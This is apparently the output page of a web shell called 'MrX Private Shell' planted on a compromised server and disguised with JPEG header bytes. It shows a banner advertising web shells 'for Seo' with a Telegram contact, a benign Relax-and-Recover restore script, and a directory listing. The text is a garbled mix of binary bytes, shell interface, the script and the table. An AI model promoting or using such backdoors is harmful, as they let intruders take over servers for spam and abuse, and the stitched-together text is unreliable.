����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
# 460_press_y_to_continue.sh
unset REPLY
while true ; do
# Use the original STDIN STDOUT and STDERR when 'rear' was launched by the user
# because 'read' outputs non-error stuff also to STDERR (e.g. its prompt):
read -t $WAIT_SECS -r -n 1 -p "Press 'y' to continue or wait for $WAIT_SECS seconds timeout: " 0<&6 1>&7 2>&8
rc=$?
# In case of timeout 'read -t' results exit code 142 = 128 + 14 (14 is SIGALRM timer signal from alarm(2)):
(( $rc == 142 )) && break
(( $rc == 1 )) && break
case $REPLY in
(y|Y) break ;;
(*) continue ;;
esac
done
UserOutput ""
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| 300_create_dp_restore_fs_list.sh | File | 1.19 KB | 0644 |
|
| 400_restore_with_dp.sh | File | 2.08 KB | 0644 |
|
| 450_restore_via_gui.sh | File | 842 B | 0644 |
|
| 460_press_y_to_continue.sh | File | 612 B | 0644 |
|